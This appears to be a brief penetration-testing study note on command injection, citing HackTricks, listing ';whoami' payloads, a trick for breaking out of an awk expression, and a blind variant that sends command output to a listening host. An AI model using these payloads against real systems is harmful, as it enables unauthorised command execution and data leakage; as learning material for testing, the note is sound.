Command Injection

https://book.hacktricks.xyz/pentesting-web/command-injection Payloads

; whoami

; whoami ;

; whoami ; #

Close logic via our controlled input, then execute

 awk 'BEGIN {print sqrt(((-2)^2) + ((-3)^2))}'

3)^2))}';whoami;#

Blind

http://LOCALHIP>:PORT/?=`whoami`

Response on listening server:

HEAD /?=www-data HTTP/1.1